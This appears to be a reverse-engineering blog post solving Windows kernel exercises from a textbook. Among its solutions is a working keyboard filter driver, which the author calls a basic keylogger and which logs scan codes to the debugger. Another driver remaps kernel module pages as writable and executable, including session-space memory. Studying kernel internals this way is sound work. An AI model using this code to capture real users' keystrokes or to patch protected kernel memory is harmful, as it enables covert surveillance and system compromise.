"- or _", "= or +", "Backspace", "Tab", "Q", "W", "E", "R", "T", "Y", "U", "I", "O", "P", "[ or {", "] or }", "Enter", "LCtrl",
"A", "S", "D", "F", "G", "H", "J", "K", "L", "; or :", "' or \"", "` or ~", "LShift", "\\ or |",
"Z","X", "C", "V", "B", "N", "M", ", or <", ". or >", "/ or ?", "RShift", "<unk>", "LAlt", "space", "CapsLock"
};
VOID MyUnload(__in PDRIVER_OBJECT DriverObject)
{
DbgPrint("Unload routine\n");
IoDetachDevice(kbd_class_dev);
IoDeleteDevice(my_keyboard_dev);
}
NTSTATUS io_completion(PDEVICE_OBJECT DeviceObject, PIRP Irp, PVOID Context)
{
KEYBOARD_INPUT_DATA *key_buffer;
unsigned long key_number = 0, i;
// read data from the IRP, put it in key
if(Irp->IoStatus.Status == STATUS_SUCCESS)
{
// system buffer may contain an array of KEYBOARD_INPUT_DATA
// The size (in bytes) of the SystemBuffer is stored in Irp->IoStatus.Information
key_buffer = (PKEYBOARD_INPUT_DATA)Irp->AssociatedIrp.SystemBuffer;
if(Irp->IoStatus.Information != 0)
{
key_number = (unsigned long)(Irp->IoStatus.Information) / sizeof(KEYBOARD_INPUT_DATA);
}
for(i = 0; i < key_number; i++)
{
// only log char in a key release event, not key press
if(key_buffer[i].Flags == KEY_BREAK)
{
if(key_buffer[i].MakeCode < SCAN_MAPPINGS)
{
// translate and log the scan code
DbgPrint("Key scancode: %s \n", scan_code_mapping[ key_buffer[i].MakeCode ]);
}
else
{
DbgPrint("<unk>\n");
}
}
}
}
if(Irp->PendingReturned) IoMarkIrpPending(Irp);
return Irp->IoStatus.Status;
}
NTSTATUS kbd_mj_read(PDEVICE_OBJECT DeviceObject, PIRP Irp)
{
IoCopyCurrentIrpStackLocationToNext(Irp);
IoSetCompletionRoutine(Irp, io_completion, NULL, TRUE, TRUE, TRUE);
return IoCallDriver(((PDEVICE_EXTENSION)DeviceObject->DeviceExtension)->pTargetDevice, Irp);
}
NTSTATUS DriverEntry(DRIVER_OBJECT *DriverObject, PUNICODE_STRING RegistryPath)
{
NTSTATUS status_code;
UNICODE_STRING kbd_class_name;
PFILE_OBJECT kbd_class_file = NULL;
PDEVICE_EXTENSION device_ext;
int i;
DriverObject->DriverUnload = &MyUnload;
DriverObject->MajorFunction[IRP_MJ_READ] = &kbd_mj_read;
// create a new device
status_code = IoCreateDevice(DriverObject, sizeof(DEVICE_EXTENSION), NULL, FILE_DEVICE_KEYBOARD, 0, FALSE, &my_keyboard_dev);
if(status_code != STATUS_SUCCESS)
{
DbgPrint("Error creating device \n");
return STATUS_UNSUCCESSFUL;
}
// retrieve the keyboard class device
RtlInitUnicodeString(&kbd_class_name, L"\\Device\\KeyboardClass0");
status_code = IoGetDeviceObjectPointer(&kbd_class_name, FILE_READ_ATTRIBUTES, &kbd_class_file, &kbd_class_dev);
if(status_code != STATUS_SUCCESS)
{
DbgPrint("Error getting keyboard class object \n");
return STATUS_UNSUCCESSFUL;
}
// set the device extension for the new device and attach it to class device
RtlZeroMemory(my_keyboard_dev->DeviceExtension, sizeof(DEVICE_EXTENSION));
device_ext = (PDEVICE_EXTENSION)my_keyboard_dev->DeviceExtension;
device_ext->pTargetDevice = IoAttachDeviceToDeviceStack(my_keyboard_dev, kbd_class_dev);
if(device_ext->pTargetDevice == NULL)
{
DbgPrint("Error attaching to keyboard device \n");
return STATUS_UNSUCCESSFUL;
}
// important! Set the correct flags for the new device, especially DO_BUFFERED_IO, or else
// the new device won't have any flag set, and IRP.AssociatedIrp.SystemBuffer will be zero
// causing the system to copy the scancode data to a NULL buffer, which will bsod
my_keyboard_dev->Flags = kbd_class_dev->Flags;
return STATUS_SUCCESS;
}
</code></pre>
<div style="text-align: justify;">
<br>
<span style="font-family: Verdana, sans-serif;">The driver implements a basic keylogger. It attaches its device object to the keyboard device stack and filters the IRPs going to it. In particular, the device object is created via <i>IoCreateDevice</i>, passing <i>FILE_DEVICE_KEYBOARD</i> as the <i>DeviceType</i> and setting its <i>DeviceExtension</i> to target the keyboard device stack via <i>IoAttachDeviceToDeviceStack</i>. The keyboard device is obtained via <i>IoGetDeviceObjectPointer</i>, by specifying <i>\\Device\\KeyboardClass0</i> as the <i>ObjectName</i>. The flags of the keyboard device are actually used to set the ones of the newly created device object, as explained in the source code.<br>
Moreover, the <i>MajorFunction[IRP_MJ_READ]</i> entry (in the driver object) is set to a simple pass-through function, that receives an IRP, sets a completion routine (via <i>IoSetCompletionRoutine</i>), copies the current stack location to the next device stack location (via <i>IoCopyCurrentIrpStackLocationToNext</i>) and calls its IRP_MJ_READ function (via <i>IoCallDriver</i>).
The completion routine processes the IRP after the keyboard driver has filled it with the information about the received keystroke. The driver simply inspects each <i>KEYBOARD_INPUT_DATA</i> structure from the output buffer (stored in IRP.AssociatedIrp.SystemBuffer) and retrieves the keystroke scan codes. </span><span style="font-family: Verdana, sans-serif;">I used standard scan codes to perform a very basic mapping of the keystrokes to the relative characters, however such translation is in general way more complicated than this implementation.<br>
During the unloading of the driver, the device will be first detached from the keyboard one (via <i>IoDetachDevice</i>) and then deleted (via <i>IoDeleteDevice</i>).
</span></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><b>7)</b></span><br />
<span style="font-family: Verdana, sans-serif;">The first implementation I wrote is the following:</span><br />
<style type="text/css">
pre.CICodeFormatter{
font-family:arial;
font-size:12px;
border:1px dashed #CCCCCC;
width:99%;
height:auto;
overflow:auto;
background:#f0f0f0;
line-height:20px;
background-image:URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RLiAlfLucI_qoHJvHaLwvgXby8Z5TK-aqUneDA06kscMW-ILm4a94iJq4qsFWJQEUtkkWWtnA6woWdwoPT2LE4DB2URdsSOOa3-smdrFFQB1oG2jam0NLQaJYk7Z95MyTJNdoHSDytEn/s320/codebg.gif);
padding:0px;
color:#000000;
text-align:left;
}
pre.CICodeFormatter code{
color:#000000;
word-wrap:normal;
}
</style>
<pre class="CICodeFormatter"><code class="CICodeFormatter"> #include <ntifs.h>
#include <string.h>
#define WORD UINT16
#define DWORD UINT32
#define BYTE UINT8
VOID MyUnload(PDRIVER_OBJECT DriverObject)
{
DbgPrint("Unload routine\n");
}
// return value: 0 = success, nonzero = error
int change_protection(BYTE *virtual_address, ULONG length, PMDL *Mdl, PVOID *address)
{
*Mdl = IoAllocateMdl(virtual_address, length, 0, 0, NULL);
if(Mdl == NULL)
{
return 1;
}
MmProbeAndLockPages(*Mdl, KernelMode, IoReadAccess);
*address = MmMapLockedPagesSpecifyCache(*Mdl, KernelMode, MmNonCached, (PVOID)virtual_address, FALSE, NormalPagePriority);
if(*address == NULL)
{
return 2;
}
DbgPrint("Mapped address: %lx \n", *address);
if(MmProtectMdlSystemAddress(*Mdl, PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS)
{
return 3;
}
return 0;
}
void unmap_mdl(PMDL *Mdl, PVOID *Address)
{
MmUnmapLockedPages(*Address, *Mdl);
IoFreeMdl(*Mdl);
}
NTSTATUS DriverEntry(DRIVER_OBJECT *DriverObject, PUNICODE_STRING RegistryPath)
{
NTSTATUS status_code;
BYTE *nonpaged_address;
int code;
PMDL pMdl;
BYTE *new_address;
DriverObject->DriverUnload = MyUnload;
<b> </b> // taken from monitor.sys<b> (</b>mapped in the range fffff880`0459f000 - fffff880`045ad000<b>)</b>
nonpaged_address = (BYTE *)0xfffff8800459f000;
code = change_protection(nonpaged_address, 0x10, &pMdl, (void*)&new_address);
DbgPrint("change protection return value: %d \n", code);
unmap_mdl(&pMdl, (void*)&new_address);
return STATUS_SUCCESS;
}
</code></pre><br>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The driver creates a MDL associated to a virtual address, then probes and locks it and finally maps it to a new virtual address. As an extra, I call the function <i>MmProtectMdlSystemAddress</i> to ensure that the RWX protection is set, but by debugging I have noticed that such protection is already in place after <i>MmMapLockedPagesSpecifyCache</i> (<i>MmBuildMdlForNonPagedPool</i> would have been more appropriate normally, but for the sake of this exercise it can be ignored). After the work is done, the MDL is<b> </b>released by unmapping its pages and deallocating it.</span></div><br>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">To verify that the protection is successfully changed, I made a simple test. I used the <i>!pte</i> debugger extension to translate the virtual address of the imagebase of <i>monitor.sys</i>:</span></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">kd> !pte 0xfffff8800459f000</span><br />
<span style="font-family: Courier New, Courier, monospace;">VA fffff8800459f000</span><br />
<br />
<span style="font-family: 'Courier New', Courier, monospace;">PXE at FFFFF6FB7DBEDF88 </span><br />
<span style="font-family: Courier New, Courier, monospace;">contains 000000003BF84863</span><br />
<span style="font-family: Courier New, Courier, monospace;">pfn 3bf84 ---DA--KWEV</span><br />
<br />
<span style="font-family: Courier New, Courier, monospace;">PPE at FFFFF6FB7DBF1000 </span><br />
<span style="font-family: Courier New, Courier, monospace;">contains 000000003BF83863</span><br />
<span style="font-family: Courier New, Courier, monospace;">pfn 3bf83 ---DA--KWEV</span><br />
<br />
<span style="font-family: Courier New, Courier, monospace;">PDE at FFFFF6FB7E200110 </span><br />
<span style="font-family: Courier New, Courier, monospace;">contains 0000000020CEE863</span><br />
<span style="font-family: Courier New, Courier, monospace;">pfn 20cee ---DA--KWEV</span><br />
<br />
<span style="font-family: Courier New, Courier, monospace;">PTE at FFFFF6FC40022CF8</span><br />
<span style="font-family: Courier New, Courier, monospace;">contains 800000003CDD7963</span><br />
<span style="font-family: Courier New, Courier, monospace;">pfn 3cdd7 <b>-G-DA--KW-V</b></span><br />
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<span style="font-family: Verdana, sans-serif; text-align: justify;">(the command output has been edited for better readability)</span><br />
<span style="font-family: Verdana, sans-serif; text-align: justify;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Then, I repeated the test by using the virtual address that I obtained with </span><span style="font-family: Verdana, sans-serif;"><i>MmMapLockedPagesSpecifyCache</i></span><span style="font-family: Verdana, sans-serif;">:</span><br />
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">kd> !pte fffff8800d249000</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">VA fffff8800d249000</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">PXE at FFFFF6FB7DBEDF88 </span><br />
<span style="font-family: Courier New, Courier, monospace;">contains 000000003BF84863</span><br />
<span style="font-family: Courier New, Courier, monospace;"></span><br />
<span style="font-family: Courier New, Courier, monospace;">pfn 3bf84 ---DA--KWEV</span><br />
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PPE at FFFFF6FB7DBF1000 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">contains 000000003BF83863</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">pfn 3bf83 ---DA--KWEV</span></div>
</div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PDE at FFFFF6FB7E200348 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">contains 0000000035879863</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">pfn 35879 ---DA--KWEV</span></div>
</div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PTE at FFFFF6FC40069248</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">contains 000000003CDD7963</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">pfn 3cdd7 <b>-G-DA--KWEV</b></span></div>
</div>
<div>
<br /></div>
</div>
</div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The log shows that while the former lacks the executable protection, the latter does not.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">As suggested by the exercise, I tested the same code using the imagebase address of <i>win32k.sys</i>, that is a session space address, and the system crashed with a BSOD. A quick investigation revealed the problem: the DriverEntry routine is called in the context of the System process, which is not associated to any session. Thus, the session space virtual addresses are not available and cannot be used to build MDLs.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">I experimented a bit and found a simple trick to bypass this problem: if the System process is not associated to a session, the code should work if it is run from the context of a process that is associated to a session. This is a simple modification that would make the driver code work:</span><br />
<style type="text/css">
pre.CICodeFormatter{
font-family:arial;
font-size:12px;
border:1px dashed #CCCCCC;
width:99%;
height:auto;
overflow:auto;
background:#f0f0f0;
line-height:20px;
background-image:URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RLiAlfLucI_qoHJvHaLwvgXby8Z5TK-aqUneDA06kscMW-ILm4a94iJq4qsFWJQEUtkkWWtnA6woWdwoPT2LE4DB2URdsSOOa3-smdrFFQB1oG2jam0NLQaJYk7Z95MyTJNdoHSDytEn/s320/codebg.gif);
padding:0px;
color:#000000;
text-align:left;
}
pre.CICodeFormatter code{
color:#000000;
word-wrap:normal;
}
</style>
<pre class="CICodeFormatter"><code class="CICodeFormatter"> KAPC_STATE apcstate;
// taken from fffff960`00060000 fffff960`00370000 win32k
KeStackAttachProcess((PEPROCESS)0xfffffa8002d7a770, &apcstate); // explorer peprocess
nonpaged_address = (BYTE *)0xfffff96000060000;
code = change_protection(nonpaged_address, 0x10);
DbgPrint("change protection return value: %d \n", code);
KeUnstackDetachProcess(&apcstate);
</code></pre>
<div style="text-align: justify;">
<div style="text-align: justify;">
<br />
<span style="font-family: Verdana, sans-serif;">I used <i>KeStackAttachProcess</i> in order to get in the context of <i>Explorer.exe</i>, which is associated to the currently logged in user, but any other process run inside the same login session would have worked (the PEPROCESS is hardcoded just for this test). Debugging this code, I tested the accessibility of <i>win32k.sys</i> imagebase address via WinDbg before the driver attached to <i>Explorer</i>:</span><br />
<br />
<span style="font-family: Courier New, Courier, monospace;">kd> !pte 0xfffff96000060000</span><br />
<span style="font-family: Courier New, Courier, monospace;">VA fffff96000060000</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">PXE at FFFFF6FB7DBEDF90 </span><br />
<span style="font-family: Courier New, Courier, monospace;">contains 0000000000000000</span><br />
<span style="font-family: Courier New, Courier, monospace;"></span><br />
<span style="font-family: Courier New, Courier, monospace;">not valid</span><br />
<div>
<br /></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">kd> db 0xfffff96000060000</span></div>
<span style="font-family: Courier New, Courier, monospace;">fffff960`00060000 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????</span><br />
<div>
<br /></div>
<span style="font-family: Verdana, sans-serif;">Translating the virtual address to a physical one shows an invalid PTE, and even dumping the bytes from that memory address returns no data. However, as soon as I step beyond </span><span style="font-family: Verdana, sans-serif;"><i>KeStackAttachProcess</i></span><span style="font-family: Verdana, sans-serif;"> the address becomes available:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">kd> !pte fffff960`00060000</span><br />
<br />
<span style="font-family: Courier New, Courier, monospace;">VA fffff96000060000</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">PXE at FFFFF6FB7DBEDF90 </span><br />
<span style="font-family: Courier New, Courier, monospace;">contains 00000000184BC863</span><br />
<br />
<span style="font-family: Courier New, Courier, monospace;">pfn 184bc ---DA--KWEV</span><br />
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PPE at FFFFF6FB7DBF2C00 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">contains 0000000018ACD863</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">pfn 18acd ---DA--KWEV</span></div>
</div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PDE at FFFFF6FB7E580000 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">contains 0000000018DCC863</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">pfn 18dcc ---DA--KWEV</span></div>
</div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PTE at FFFFF6FCB0000300</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">contains 8030000012588201</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">pfn 12588 <b>C------KR-V</b></span></div>
</div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif;">and the driver code works too, creating a mapping with RWX attribute:</span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">kd> !pte fffff8800e0b4000</span></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">VA fffff8800e0b4000</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">PXE at FFFFF6FB7DBEDF88 </span><br />
<span style="font-family: Courier New, Courier, monospace;">contains 000000003BF84863</span><br />
<span style="font-family: Courier New, Courier, monospace;">pfn 3bf84 ---DA--KWEV</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">PPE at FFFFF6FB7DBF1000 </span><br />
<span style="font-family: Courier New, Courier, monospace;">contains 000000003BF83863</span><br />
<span style="font-family: Courier New, Courier, monospace;">pfn 3bf83 ---DA--KWEV</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">PDE at FFFFF6FB7E200380 </span><br />
<span style="font-family: Courier New, Courier, monospace;">contains 0000000030237863</span><br />
<span style="font-family: Courier New, Courier, monospace;">pfn 30237 ---DA--KWEV</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">PTE at FFFFF6FC400705A0</span><br />
<span style="font-family: Courier New, Courier, monospace;">contains 0000000012588963</span><br />
<span style="font-family: Courier New, Courier, monospace;"></span><br />
<span style="font-family: Courier New, Courier, monospace;">pfn 12588 -G-DA--<b>KWEV</b></span></div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
</div>
<div>
<span style="font-family: Verdana, sans-serif;">If I step further down with the debugger, and go after <i>KeUnstackDetachProcess</i>, the address becomes dead again.</span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<span style="font-family: Verdana, sans-serif;"><b>8)</b></span><br />
<span style="font-family: Verdana, sans-serif;">To figure out which function is calling the <i>DriverEntry</i> I have: written a dummy driver; set a breakpoint on its entry point with <i>DbgBreakPoint()</i>; run it under kernel debugging so that I could dump the stack.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">driver!DriverEntry+0x3a</span><br />
<span style="font-family: Courier New, Courier, monospace;">nt!IopLoadDriver+0xa07</span><br />
<span style="font-family: Courier New, Courier, monospace;">nt!IopLoadUnloadDriver+0x55</span><br />
<span style="font-family: Courier New, Courier, monospace;">nt!ExpWorkerThread+0x111</span><br />
<span style="font-family: Courier New, Courier, monospace;">nt!PspSystemThreadStartup+0x5a</span><br />
<span style="font-family: Courier New, Courier, monospace;">nt!KxStartSystemThread+0x16</span><br />
<div>
<br /></div>
<span style="font-family: Verdana, sans-serif;">The dump shows the functions that were called right before the <i>DriverEntry</i>. The direct responsible for calling the entry point is <i>IopLoadDriver</i>, which is in turn called by <i>IopLoadUnloadDriver</i>. This function manages both the loading and unloading of a driver (calling the entry point or the driver unload routine respectively), and it is called by a dedicated system thread, as can be noted by the three functions <i>ExpWorkerThread</i>, <i>PspSystemThreadStartup</i> and <i>KxStartSystemThread</i>.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
</div>giuliahttp://www.blogger.com/profile/12995367052667481710noreply@blogger.com0tag:blogger.com,1999:blog-8573685359056491736.post-61802980568543660492014-11-11T11:43:00.001-08:002014-11-11T12:12:13.720-08:00Solution to some of "The Windows kernel" exercises from Practical Reverse Engineering<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Recently I spent some time improving my knowledge of the Windows kernel and I gave a go at some of the exercises from the "<a href="http://eu.wiley.com/WileyCDA/WileyTitle/productCd-1118787315,subjectCd-CSJ0.html">Practical Reverse Engineering</a>" book. I wanted to share the solutions to the ones proposed on page 180 ("Building Knowledge and Solidifying Your Knowledge" from "The Windows Kernel" chapter), as I think this can be an opportunity to discuss them with other people :) Hopefully I will be able to share more solutions in future blog entries! :)</span><br />
<span style="font-family: Verdana, sans-serif;"><b><br /></b></span>
<span style="font-family: Verdana, sans-serif;"><b>1) </b></span></div>
<div style="text-align: justify;">
</div>
<ul>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">First explanation: if a driver thread runs at DISPATCH_LEVEL, it cannot be interrupted (or pre-empted) by other code from lower IRQLs (that are PASSIVE_LEVEL and APC_LEVEL). If such a thread accesses a page that has been swapped to disk, the page fault handler will generate an I/O operation to read the page from the disk and restore it in memory... and here is the catch: the completion routine for I/O runs in APC_LEVEL, which means that the I/O for the swapped page won't be able to complete, causing a BSOD.</span></li>
</ul>
<ul>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">Second explanation: page faults at DISPATCH_LEVEL may not be caught by exception handlers. Even if a driver encloses a "dangerous" piece of code inside a try/except statement, if such code generates for example a page fault in non-paged memory, the fault will not be dispatched to the exception handler and the system will throw a blue screen. Thus, even writing "careful" code that protects pointers' dereference with exception handlers will not mitigate blue screens. Here is a quote from a minidump generated by a PAGE_FAULT_IN_NONPAGED_AREA:</span></li>
</ul>
<ul><span style="font-family: Courier New, Courier, monospace;">PAGE_FAULT_IN_NONPAGED_AREA (50)</span></ul>
<ul><span style="font-family: Courier New, Courier, monospace;">Invalid system memory was referenced. This cannot be protected by try-except, it must be protected by a Probe.</span></ul>
<ul><span style="font-family: Verdana, sans-serif;">Note that there are page faults that can be safely caught by exception handlers, e.g. access violations to usermode pointers.</span></ul>
<br />
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>2) </b></span><br />
<span style="font-family: Verdana, sans-serif;"><u><br /></u></span>
<span style="font-family: Verdana, sans-serif;"><u>Thread priority</u> is used by the scheduler to decide which thread must be run next and for how long. The operation of interrupting a thread to schedule the next one is called <u>thread dispatching</u>. However, the thread dispatcher only operates at PASSIVE_LEVEL or APC_LEVEL. Thus, if a thread is at DISPATCH_LEVEL or above, the thread dispatcher won't be able to pre-empt it and the thread "priority" will depend</span><span style="font-family: Verdana, sans-serif;"> on the </span><u style="font-family: Verdana, sans-serif;">IRQL</u><span style="font-family: Verdana, sans-serif;"> itself</span><span style="font-family: Verdana, sans-serif;">. Therefore, in this sense,</span><span style="font-family: Verdana, sans-serif;"> code in kernel mode that runs at DISPATCH_LEVEL can run "faster", but having a heavy workload at high IRQL will cause a general degradation of performance for the whole system. Code that runs at high IRQL should be designed to run and finish its task as quickly as possible in order not to degrade performance in general.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>3)</b></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">The following code monitors the creation and termination of threads and processes, and the loading and unloading of executable modules.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RLiAlfLucI_qoHJvHaLwvgXby8Z5TK-aqUneDA06kscMW-ILm4a94iJq4qsFWJQEUtkkWWtnA6woWdwoPT2LE4DB2URdsSOOa3-smdrFFQB1oG2jam0NLQaJYk7Z95MyTJNdoHSDytEn/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> #include <ntddk.h>
#include <string.h>
DRIVER_INITIALIZE DriverEntry;
#ifdef ALLOC_PRAGMA
#pragma alloc_text( INIT, DriverEntry )
#endif
VOID ImageHandler(
__in_opt PUNICODE_STRING FullImageName,
__in HANDLE ProcessId,
__in PIMAGE_INFO ImageInfo
)
{
DbgPrint("ImageBase: %016x\n", ImageInfo->ImageBase);
}
VOID ProcessHandler(
IN HANDLE ParentId,
IN HANDLE ProcessId,
IN BOOLEAN Create
)
{
DbgPrint("Pid: %08x\n", ProcessId);
}
VOID ThreadHandler(
IN HANDLE ProcessId,
IN HANDLE ThreadId,
IN BOOLEAN Create
)
{
DbgPrint("Tid: %08x\n", ThreadId);
}
VOID MyUnload(
__in PDRIVER_OBJECT DriverObject
)
{
DbgPrint("Unload routine\n");
if(PsRemoveLoadImageNotifyRoutine(&ImageHandler) != STATUS_SUCCESS ||
PsSetCreateProcessNotifyRoutine(&ProcessHandler, TRUE) != STATUS_SUCCESS ||
PsRemoveCreateThreadNotifyRoutine(&ThreadHandler) != STATUS_SUCCESS)
{
DbgPrint("Error in unregistering notify routines\n");
}
}
NTSTATUS DriverEntry(__in PDRIVER_OBJECT DriverObject, __in PUNICODE_STRING RegistryPath)
{
NTSTATUS StatusTemp;
DbgPrint("Driver started\n");
DriverObject->DriverUnload = &MyUnload;
if( PsSetLoadImageNotifyRoutine(&ImageHandler) != STATUS_SUCCESS )
{
DbgPrint("Error registering ImageHandler\n");
return STATUS_INSUFFICIENT_RESOURCES;
}
StatusTemp = PsSetCreateProcessNotifyRoutine(&ProcessHandler, FALSE);
if( StatusTemp != STATUS_SUCCESS )
{
DbgPrint("Error registering ProcessHandler\n");
return STATUS_INSUFFICIENT_RESOURCES;
}
StatusTemp = PsSetCreateThreadNotifyRoutine(&ThreadHandler);
if(StatusTemp != STATUS_SUCCESS)
{
DbgPrint("Error registering ThreadHandler\n");
return STATUS_INSUFFICIENT_RESOURCES;
}
return STATUS_SUCCESS;
}
</code></pre>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">An example of the output it produces:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">ImageBase: 00000000fcae0000</span><br />
<span style="font-family: Courier New, Courier, monospace;">ImageBase: 00000000fcae0000</span><br />
<span style="font-family: Courier New, Courier, monospace;">Tid: 00000e64</span><br />
<span style="font-family: Courier New, Courier, monospace;">Tid: 000003dc</span><br />
<span style="font-family: Courier New, Courier, monospace;">Tid: 000006c4</span><br />
<span style="font-family: Courier New, Courier, monospace;">Tid: 000005b8</span><br />
<span style="font-family: Courier New, Courier, monospace;">Pid: 00000f48</span><br />
<span style="font-family: Courier New, Courier, monospace;">Tid: 00000da8</span><br />
<span style="font-family: Courier New, Courier, monospace;">Tid: 00000ac8</span><br />
<span style="font-family: Courier New, Courier, monospace;">Tid: 00000c6c</span><br />
<span style="font-family: Courier New, Courier, monospace;">Tid: 00000870</span><br />
<span style="font-family: Courier New, Courier, monospace;">Tid: 00000d20</span><br />
<span style="font-family: Courier New, Courier, monospace;">Tid: 000006b4</span><br />
<span style="font-family: Courier New, Courier, monospace;">Tid: 00000448</span><br />
<span style="font-family: Courier New, Courier, monospace;">Tid: 00000ed4</span><br />
<span style="font-family: Courier New, Courier, monospace;">Tid: 00000d8c</span><br />
<span style="font-family: Courier New, Courier, monospace;">Pid: 00000d50</span><br />
<span style="font-family: Courier New, Courier, monospace;">Tid: 000005b0</span><br />
<span style="font-family: Courier New, Courier, monospace;">ImageBase: 00000000ff330000</span><br />
<span style="font-family: Courier New, Courier, monospace;">ImageBase: 0000000077bd0000</span><br />
<span style="font-family: Courier New, Courier, monospace;">ImageBase: 0000000077ab0000</span><br />
<span style="font-family: Courier New, Courier, monospace;">ImageBase: 00000000fdbc0000</span><br />
<span style="font-family: Courier New, Courier, monospace;">ImageBase: 00000000ffe00000</span><br />
<span style="font-family: Courier New, Courier, monospace;">ImageBase: 00000000ff4d0000</span><br />
<span style="font-family: Courier New, Courier, monospace;">ImageBase: 00000000fe180000</span><br />
<span style="font-family: Courier New, Courier, monospace;">ImageBase: 00000000fe1b0000</span><br />
<span style="font-family: Courier New, Courier, monospace;">Unload routine</span><br />
<div>
<br /></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>4) </b></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">If METHOD_NEITHER is employed, the I/O manager does not provide any validation on the buffer that is received from the usermode application, nor it generates an MDL for it (as opposed to METHOD_BUFFERED and METHOD_[IN/OUT]_DIRECT). This means that the address of the usermode buffer is passed directly to the target driver, that is in charge of performing all the necessary validations. A driver should<b> </b>probe the pages to make them resident and to verify that it has the requested access (e.g. read/write) to the user buffer. Then, it<b> </b>should lock the pages (so that they won't be paged out to the swap file) and should access the data, making sure that the code that does these operations is enclosed in a try/except block to handle potential exceptions (e.g. if a usermode thread changes the memory protection of the buffer while the driver is accessing it). The use of METHOD_NEITHER also implies that the driver code that carries out the validation of the buffer needs to run in the same context of the thread that generated the IOCTL request (for example, if the IRP is queued for later processing, it may be processed in an arbitrary thread/process context, thus the address of the user buffer may not refer to the correct virtual memory any more).</span></div>
